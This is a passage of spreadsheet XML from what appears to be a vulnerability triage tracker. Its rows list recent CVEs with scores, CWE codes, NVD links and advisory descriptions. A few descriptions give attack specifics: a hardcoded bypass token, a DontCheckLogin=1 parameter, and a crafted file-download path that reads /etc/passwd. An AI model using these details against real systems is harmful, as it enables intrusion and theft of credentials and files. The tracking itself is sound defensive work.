      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S219" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in Estatik &lt;= 4.3.5 versions.</t>
        </is>
      </c>
      <c r="T219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96345</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96346</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S220" s="5" t="inlineStr">
        <is>
          <t>Author SQL Injection in WP ERP &lt;= 1.17.9 versions.</t>
        </is>
      </c>
      <c r="T220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96346</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96827</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="inlineStr"/>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S221" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in Admin Notices Manager &lt;= 1.6.0 versions.</t>
        </is>
      </c>
      <c r="T221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96827</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96828</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S222" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in Category Discount Woocommerce &lt;= 5.18 versions.</t>
        </is>
      </c>
      <c r="T222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96828</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54402</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S223" s="5" t="inlineStr">
        <is>
          <t>iDocView contains a server-side request forgery vulnerability in its /doc/upload endpoint that allows remote unauthenticated attackers to fetch arbitrary URLs by supplying a hardcoded default token value (testtoken) to bypass authentication. Attackers can exploit the unrestricted URL scheme handling, including file:// URIs, to read arbitrary local files such as operating-system and application configuration files, and to reach internal network hosts and services not otherwise accessible. Exploitation evidence was first observed by the Shadowserver Foundation on 2024-03-26.</t>
        </is>
      </c>
      <c r="T223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54402</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54403</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="inlineStr"/>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S224" s="5" t="inlineStr">
        <is>
          <t>Yonyou U8 CRM before V16.5 and V18 contains an arbitrary file read vulnerability in /ajax/getemaildata.php that allows unauthenticated attackers to bypass authentication using the DontCheckLogin=1 parameter and read arbitrary files via an unvalidated filePath parameter. Attackers can exploit this flaw to read sensitive files outside the web application directory, including configuration files containing database or service credentials. Exploitation evidence was first observed by the Shadowserver Foundation on 2023-10-14.</t>
        </is>
      </c>
      <c r="T224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54403</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58387</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="inlineStr"/>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S225" s="5" t="inlineStr">
        <is>
          <t>Inspur Haiyue HCM Cloud contains an arbitrary file read vulnerability in the /api/model_report/file/download endpoint that allows unauthenticated remote attackers to read arbitrary files by supplying unvalidated path parameters index and ext. Attackers can craft requests such as /api/model_report/file/download?index=/&amp;ext=&lt;path&gt; to traverse the filesystem and disclose sensitive files including /etc/passwd, application database files, and system configuration files. Exploitation evidence was first observed by the Shadowserver Foundation on 2024-11-04 .</t>
        </is>
      </c>
      <c r="T225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58387</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101884</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="inlineStr"/>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr">
        <is>
          <t>dotnet</t>
        </is>
      </c>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="S226" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Windows Node before 2026.7.1 contains an incomplete environment-variable sanitizer in system.run that fails to block GIT_CONFIG_*, DOTNET_STARTUP_HOOKS, and JAVA_TOOL_OPTIONS variables. Attackers with gateway or agent access can supply these variables to allowlisted tools like git, dotnet, or java to load attacker-controlled code and achieve arbitrary code execution.</t>
        </is>
      </c>
      <c r="T226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101884</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102091</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="inlineStr"/>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K227" s="5" t="inlineStr"/>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S227" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Secure Data Forms before version 9.5.0 is vulnerable to Server-Side Request Forgery that could allow an unauthenticated, remote attacker to make the server issue arbitrary outbound network requests and read back the responses. This could potentially be used to reach internal-only services or other network-restricted resources.</t>
        </is>
      </c>
      <c r="T227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102091</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102128</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="inlineStr"/>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S228" s="5" t="inlineStr">
        <is>
          <t>An identity-verification weakness in Kiteworks Email Protection Gateway allowed the gateway to act on the Kiteworks platform on behalf of a user it had not authenticated, and to provision a platform account for an identity it did not already know. A remote, unauthenticated sender could potentially exploit this to obtain control of a platform account.</t>
        </is>
      </c>
      <c r="T228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102128</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102143</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="inlineStr"/>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr"/>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-434</t>
        </is>
      </c>
      <c r="S229" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated attacker could cause a file with attacker-controlled content to be written to the appliance filesystem through an administrative upload handler that did not properly authenticate the request. This did not by itself result in code execution, which would require a separate vulnerability to place the file in an executable location.</t>
        </is>
      </c>
      <c r="T229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102143</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102717</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="inlineStr"/>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr"/>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-457</t>
        </is>
      </c>
      <c r="S230" s="5" t="inlineStr">
        <is>
          <t>MQTT WebSocket setter ABI mismatch may disclose memory or cause a crash</t>
        </is>
      </c>
      <c r="T230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102717</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103472</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="inlineStr"/>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr"/>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S231" s="5" t="inlineStr">
        <is>
          <t>restbed through 5.0.0 accepts WebSocket frames with declared payload lengths up to 2^63 bytes and buffers the payload without size limits in an unbounded stream buffer. Remote unauthenticated attackers can declare large frame sizes and stream payload data to exhaust server memory, causing denial of service through process crash.</t>
        </is>
      </c>
      <c r="T231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103472</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103591</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="inlineStr"/>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr"/>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S232" s="5" t="inlineStr">
        <is>
          <t>DeepWiki-Open through commit d92819a contains an unauthenticated arbitrary file read vulnerability in the GET /codemap/file endpoint via the repo_url parameter. Attackers can supply a non-URL repo_url value to bypass path containment checks and read any file accessible to the API process by specifying absolute file paths.</t>
        </is>
      </c>
      <c r="T232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103591</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6806</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="inlineStr"/>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S233" s="5" t="inlineStr">
        <is>
          <t>The Motors – Car Dealership &amp; Classified Listings Plugin plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'stm_lat/stm_lng' parameter in all versions up to, and including, 1.4.109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T233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6806</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75098</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="inlineStr"/>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q234" s="5" t="inlineStr"/>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S234" s="5" t="inlineStr">
        <is>
          <t>The Product Designer App plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.1.3 via the 'svg' parameter parameter. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. The endpoint's only authentication gate relies on a nonce and token that are both publicly emitted as JavaScript globals on any page rendering the [pdapp-studio-page] shortcode, making them freely obtainable by anonymous visitors.</t>
        </is>
      </c>
      <c r="T234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75098</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76145</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>vuln@krcert.or.kr</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="inlineStr"/>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q235" s="5" t="inlineStr"/>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S235" s="5" t="inlineStr">
        <is>
          <t>An improper privilege management vulnerability in Genian SSL PNS allows an attacker to escalate to super administrator privileges and force the creation of an OS account by manipulating the permission column during CSV bulk user registration</t>
        </is>
      </c>
      <c r="T235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76145</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
